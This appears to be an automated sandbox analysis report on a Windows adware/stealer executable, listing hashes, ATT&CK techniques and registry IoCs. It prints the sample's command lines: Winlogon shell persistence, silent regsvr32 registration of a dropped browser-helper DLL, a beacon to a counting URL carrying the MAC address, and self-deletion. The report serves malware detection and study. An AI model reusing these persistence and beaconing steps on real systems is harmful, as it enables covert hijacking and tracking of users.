12ba8a583fb035e61f45e7ad2b9986a84ae8c4e0e77e7770e7d86a2f7fc68e04

Analysis

max time kernel
133s
max time network
134s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
26/12/2023, 11:16

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

6a2442a4fb891753552346218815bc47.exe
Size

256KB
MD5

6a2442a4fb891753552346218815bc47
SHA1

ebd1f02cbe8eaceb7d5065ff6aee59dee7e63645
SHA256

12ba8a583fb035e61f45e7ad2b9986a84ae8c4e0e77e7770e7d86a2f7fc68e04
SHA512

60ba1b1e75d0e323bb48a83f6b51aa2026d8f2d7def67fd8c7c7697dd23cc553f2660c6258e74e9cc6dd33ff432b8c0b2e2302659582400b0c12be4ba86184a7
SSDEEP

3072:mEO9K3Cmp5z9VtzdDfFbESg5YT9o/etIyAylfFoVBL:mRBmp5zPDDVESg5YTC/etIBycB

Score

10^/10

adware persistence stealer

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,c:\\windows\\system32\\Ieautoups.exe"	6a2442a4fb891753552346218815bc47.exe

Deletes itself 1 IoCs

pid	Process
2588	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2140	autoups.exe

Loads dropped DLL 3 IoCs

pid	Process
2888	regsvr32.exe
2072	6a2442a4fb891753552346218815bc47.exe
2072	6a2442a4fb891753552346218815bc47.exe

Installs/modifies Browser Helper Object 2 TTPs 2 IoCs

BHOs are DLL modules which act as plugins for Internet Explorer.

stealer adware

Modify Registry

T1112

Browser Extensions

T1176

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\	6a2442a4fb891753552346218815bc47.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A3EFBC64-0833-4676-8A5F-F8CAF70A8C03}	6a2442a4fb891753552346218815bc47.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\autoups.exe	6a2442a4fb891753552346218815bc47.exe
File opened for modification	\??\c:\windows\SysWOW64\ieupdate.dll	6a2442a4fb891753552346218815bc47.exe
File created	\??\c:\windows\SysWOW64\Ieautoups.exe	6a2442a4fb891753552346218815bc47.exe
File opened for modification	\??\c:\windows\SysWOW64\Ieautoups.exe	6a2442a4fb891753552346218815bc47.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BCDA05C1-A4EF-11EE-92E9-F6BE0C79E4FA} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80603394fc38da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0720b1d8642c344adb870a2e91786640000000002000000000010660000000100002000000054e81a34fc52aec142b6c410694186a0eee15d089514e2913fd3cc6a9bce3250000000000e8000000002000020000000a1a85f745457b683c93715a685f25aaafeec4d54fdd898eb44389d1b5c597bdf9000000085e039d83a9e094e0eb71dcb5fa56481e909164a1481092a323d0320f927763748075ebb1d0172ff43581a3b77d301440c0e16b9af97077652317ad078ce65c4135c9c5d8e1df950479a9828bd3e941d0908d1fa040c95261e3e69d6d584d68a93929cdda6b0341f5d8c656635767e24e37697654b19932560d39bd3af8c5968429e23307c6679ffcb4b39e3d6e552a44000000061f5a7ef3a2452c3a78d8d943d387e55dc852168f393328303d139d06c1bc7283a288081250e4c13da59adff4f33b9bc73750cb33916ecceec6bf0bbda72845e	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "409867894"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0720b1d8642c344adb870a2e917866400000000020000000000106600000001000020000000f84a8f9161facd8aed7b237b449aac52edd9e43163acb865fd25e7ae30bdf4f5000000000e800000000200002000000039e64ad2258f63d18967c40961dc7c753aee050be25c8b3b106c146c32d359b2200000001a732d9a564438baa2f5d3aabc7ed1d4788b1946c0f3c43f10da9d6a353f8637400000003d06f1179477bffe8a0265891dbfad0bd66501b9d12576481d733f135c3ce2b747c4f4255dc99effb45fa5ac514336ac831db26c5396754bf41d085a032eeadb	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2444714103-3190537498-3629098939-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan2 = "www.86484.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url3 = "www.5566.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\InprocServer32\ = "c:\\windows\\SysWow64\\ieupdate.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\¹¤³Ì1.IE360	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url1 = "www.hao123.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan3 = "www.86484.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url7 = "www.tudou.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ = "_IE360"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\homepages = "www.86484.com"	6a2442a4fb891753552346218815bc47.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\ProgID\ = "¹¤³Ì1.IE360"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan4 = "www.86484.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\HELPDIR\ = "c:\\windows\\system32"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\Implemented Categories	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan7 = "www.hanguoqvod.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\ProgID	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\0	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\FLAGS\ = "0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url4 = "www.265.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan5 = "www.hanguoqvod.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\ = "¹¤³Ì1"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\TypeLib\ = "{FADE1563-A3A5-4061-9DC2-409BCE1B2556}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\Programmable	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url8 = "www.taobao.cn"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url6 = "www.youku.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan6 = "www.hanguoqvod.com"	6a2442a4fb891753552346218815bc47.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\HELPDIR	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\¹¤³Ì1.IE360\Clsid	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\¹¤³Ì1.IE360\Clsid\ = "{79E45146-64C2-40DD-B9DA-DAFF45453CE2}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\Implemented Categories\{40FC6ED5-2438-11CF-A3DB-080036F12502}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url5 = "www.ku6.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\0\win32\ = "c:\\windows\\SysWow64\\ieupdate.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\TypeLib\ = "{FADE1563-A3A5-4061-9DC2-409BCE1B2556}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\ = "¹¤³Ì1.IE360"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan8 = "http://search8.taobao.com/browse/cat-0-g,nvwv6mjqgaytcnjvgbptaxzq.htm?pid=mm_10854201_0_0"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\url2 = "www.114la.com"	6a2442a4fb891753552346218815bc47.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\FLAGS	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ = "_IE360"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ = "IE360"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\ProxyStubClsid	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\tihuan1 = "www.86484.com"	6a2442a4fb891753552346218815bc47.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\VERSION\ = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\¹¤³Ì1.IE360\ = "¹¤³Ì1.IE360"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lanren\ = "lanren"	6a2442a4fb891753552346218815bc47.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\VERSION	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79E45146-64C2-40DD-B9DA-DAFF45453CE2}\TypeLib\ = "{FADE1563-A3A5-4061-9DC2-409BCE1B2556}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}\1.0\0\win32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{74720E49-F490-428D-ACD8-26E1FF308185}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FADE1563-A3A5-4061-9DC2-409BCE1B2556}	regsvr32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2140	autoups.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeIncBasePriorityPrivilege	2140	autoups.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3024	iexplore.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2072	6a2442a4fb891753552346218815bc47.exe
3024	iexplore.exe
3024	iexplore.exe
2660	IEXPLORE.EXE
2660	IEXPLORE.EXE
2660	IEXPLORE.EXE
2660	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 35 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 3024	2072	6a2442a4fb891753552346218815bc47.exe	24
PID 2072 wrote to memory of 3024	2072	6a2442a4fb891753552346218815bc47.exe	24
PID 2072 wrote to memory of 3024	2072	6a2442a4fb891753552346218815bc47.exe	24
PID 2072 wrote to memory of 3024	2072	6a2442a4fb891753552346218815bc47.exe	24
PID 3024 wrote to memory of 2660	3024	iexplore.exe	30
PID 3024 wrote to memory of 2660	3024	iexplore.exe	30
PID 3024 wrote to memory of 2660	3024	iexplore.exe	30
PID 3024 wrote to memory of 2660	3024	iexplore.exe	30
PID 2072 wrote to memory of 2804	2072	6a2442a4fb891753552346218815bc47.exe	27
PID 2072 wrote to memory of 2804	2072	6a2442a4fb891753552346218815bc47.exe	27
PID 2072 wrote to memory of 2804	2072	6a2442a4fb891753552346218815bc47.exe	27
PID 2072 wrote to memory of 2804	2072	6a2442a4fb891753552346218815bc47.exe	27
PID 2804 wrote to memory of 2888	2804	cmd.exe	29
PID 2804 wrote to memory of 2888	2804	cmd.exe	29
PID 2804 wrote to memory of 2888	2804	cmd.exe	29
PID 2804 wrote to memory of 2888	2804	cmd.exe	29
PID 2804 wrote to memory of 2888	2804	cmd.exe	29
PID 2804 wrote to memory of 2888	2804	cmd.exe	29
PID 2804 wrote to memory of 2888	2804	cmd.exe	29
PID 2072 wrote to memory of 2140	2072	6a2442a4fb891753552346218815bc47.exe	37
PID 2072 wrote to memory of 2140	2072	6a2442a4fb891753552346218815bc47.exe	37
PID 2072 wrote to memory of 2140	2072	6a2442a4fb891753552346218815bc47.exe	37
PID 2072 wrote to memory of 2140	2072	6a2442a4fb891753552346218815bc47.exe	37
PID 2072 wrote to memory of 2588	2072	6a2442a4fb891753552346218815bc47.exe	36
PID 2072 wrote to memory of 2588	2072	6a2442a4fb891753552346218815bc47.exe	36
PID 2072 wrote to memory of 2588	2072	6a2442a4fb891753552346218815bc47.exe	36
PID 2072 wrote to memory of 2588	2072	6a2442a4fb891753552346218815bc47.exe	36
PID 2140 wrote to memory of 2244	2140	autoups.exe	33
PID 2140 wrote to memory of 2244	2140	autoups.exe	33
PID 2140 wrote to memory of 2244	2140	autoups.exe	33
PID 2140 wrote to memory of 2244	2140	autoups.exe	33
PID 2140 wrote to memory of 108	2140	autoups.exe	41
PID 2140 wrote to memory of 108	2140	autoups.exe	41
PID 2140 wrote to memory of 108	2140	autoups.exe	41
PID 2140 wrote to memory of 108	2140	autoups.exe	41

C:\Users\Admin\AppData\Local\Temp\6a2442a4fb891753552346218815bc47.exe
"C:\Users\Admin\AppData\Local\Temp\6a2442a4fb891753552346218815bc47.exe"
1⤵
- Modifies WinLogon for persistence
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Program Files\Internet Explorer\iexplore.exe
  "C:\Program Files\Internet Explorer\iexplore.exe" http://www.nt555.com/tongji/count/count.asp?id=F6-BE-0C-79-E4-FA&ver=1.0
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3024 CREDAT:275457 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c regsvr32 /s c:\windows\system32\ieupdate.dll
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2804
- - C:\Windows\SysWOW64\regsvr32.exe
    regsvr32 /s c:\windows\system32\ieupdate.dll
    3⤵
    - Loads dropped DLL
    - Modifies registry class
    PID:2888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\a.bat""
  2⤵
  - Deletes itself
  PID:2588
- C:\Windows\SysWOW64\autoups.exe
  autoups.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2140
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del C:\Windows\SysWOW64\autoups.exe > nul
    3⤵
    PID:108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c color 0a
1⤵
PID:2244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Browser Extensions

T1176

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
97f900673b16636679586713969882c4

SHA1
06bf3d43bb642379cb6d143842e13092616bfebe

SHA256
36d82110911833e1964e34eae114d3e559d3879a995f8bc875608f991c6f30cd

SHA512
72cd7e73ba63d1780a364ef047d1675056d4aaa4b315a804bd6ab2f4907f7a114de5a637c1bdf014073809b0917943cd06486fed631930fd6c92535ad2b2281e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
8c7f06aa16f8aa7f1383cfbffd784e92

SHA1
872120749d76c964635770acb2c86ca2dbf3be35

SHA256
658333e796e52735e56ec450d99d5f7e96ef37d10087e0323e55f3ff4fcb4318

SHA512
d1883979adea95240c882b0776b836f1e1c2aa7a42308f7d6a7e3f9588e8923466344b563fec3094dfd4e08f380ae796b783d7a87bd83c4b0c6fbef44f761b2a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
59129b08f46fc611205de6154abb57ab

SHA1
a4dd739595477958e39a07289a468690240410a2

SHA256
c45942ab889e19e6c623678e14663cb1ab7948466996e73a07815c49ab576de7

SHA512
11b1177d9ca0960daf0508677f0cd8c07ef901fbe61d1bc5787964139f853594433a522f51d3f0a9c46e4768907e29abb8ab4add3457395ca8acd50255e22e01

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
7ba47ad13e9bd5dfd69754be5ae75a50

SHA1
6b46fe718856b5928da614fc78d161335da05e59

SHA256
4f4e42cfe2a778ba544d602b8a718914b64c13233cbe924a8cc9ab13965219f5

SHA512
ddd0d138e22b1944e197024e7276d1f34de9c08e48d141b69f558751914aa9e9d3676b3b1f015dda18826f994c57dfad77c7b8bc897b5f873743c0f96e6ded1c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab740A.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar746B.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
